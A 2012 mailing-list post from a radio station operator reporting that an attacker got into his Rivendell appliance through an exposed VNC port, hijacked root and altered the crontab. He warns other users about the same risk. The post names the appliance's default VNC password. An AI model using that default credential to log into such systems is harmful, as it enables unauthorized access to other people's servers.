[RDD] security breach

Robert Jeffares jeffares.robert at gmail.com
Sun Nov 25 14:45:08 EST 2012


have had an interesting attack from what my isp says is a 'known'
source which was made through the remote desktop to the RD server.

password is rdvnc and I have never managed to figure out how to change it

anyway this attacker logged in and managed to load some code which has
hijacked the root account, then modified the crontab to run a program
which the attacker attempted to install but failed because Centos on
the appliance CD is missing a few files and the attacker was unable to
install them from the repository.  I have seen the missing file
message before but since everything is working I have ignored it.

Not sure how long this all took but discovered an open console window
on the server with a complete track of events and log files on the vnc
server indicate this happened over some considerable time.

root has lost the ability to ls but can do most everything else

Minor inconvenience bringing backup system on line, and now working on
securing the remote desktop so that it is port shifted and hopefully
we can add another layer of firewall security.

First problem in four years despite constant polling by various
parties for open ports on the broadband box. They had found the ssh
port shifted from 22 but the passwords held firm.

My fault for leaving this open.

There may be other appliance users who have left vnc ports open and
the default password just waiting for a visit from this pia.

I have looked at the vnc password howto but it is not working for me
.. or i am looking in the wrong place..

Robert Jeffares
Big Valley Radio
Thames
New Zealand


More information about the Rivendell-dev mailing list